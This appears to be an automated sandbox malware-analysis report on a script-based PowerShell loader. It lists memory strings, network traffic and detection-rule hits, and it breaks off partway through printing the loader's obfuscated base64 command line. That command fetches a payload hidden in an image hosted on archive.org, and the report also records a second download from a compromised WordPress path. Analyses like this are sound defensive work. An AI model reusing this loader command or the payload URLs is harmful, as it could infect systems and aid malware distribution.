        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000004.00000002.2221743469.000001C26C9C9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: global trafficHTTP traffic detected: GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1Host: ia601606.us.archive.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /wp-admin/sky.txt HTTP/1.1Host: maso.geConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 195.54.178.4 195.54.178.4
        Source: Joe Sandbox ViewIP Address: 195.54.178.4 195.54.178.4
        Source: Joe Sandbox ViewIP Address: 207.241.227.86 207.241.227.86
        Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1Host: ia601606.us.archive.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /wp-admin/sky.txt HTTP/1.1Host: maso.geConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: ia601606.us.archive.org
        Source: global trafficDNS traffic detected: DNS query: maso.ge
        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.86:443 -> 192.168.2.5:49704
        Source: powershell.exe, 00000004.00000002.2178327964.000001C201634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia601606.us.archive.org
        Source: powershell.exe, 00000004.00000002.2178327964.000001C2003CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maso.ge
        Source: powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2231182452.000001D3800BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000004.00000002.2178327964.000001C20167C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.2231182452.000001D38006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 00000002.00000002.2231182452.000001D38008A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000004.00000002.2178327964.000001C2010CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000002.00000002.2259432896.000001D3FED95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
        Source: powershell.exe, 00000004.00000002.2178327964.000001C20162E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601606.us.arXzJ
        Source: powershell.exe, 00000004.00000002.2178327964.000001C20162E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601606.us.archive.org
        Source: powershell.exe, 00000002.00000002.2231182452.000001D3807D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601606.us.archive.org/10/items/deathnote
        Source: powershell.exe, 00000004.00000002.2178327964.000001C200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
        Source: powershell.exe, 00000004.00000002.2178327964.000001C2003CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://maso.ge
        Source: powershell.exe, 00000004.00000002.2178327964.000001C2003CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://maso.ge/wp-admin/sky.txt
        Source: powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000004.00000002.2178327964.000001C20167C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
        Source: powershell.exe, 00000004.00000002.2178327964.000001C20167C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownHTTPS traffic detected: 207.241.227.86:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 195.54.178.4:443 -> 192.168.2.5:49705 version: TLS 1.2

        System Summary

        barindex
        Source: Process Memory Space: powershell.exe PID: 5752, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 6800, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9300
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9300Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? 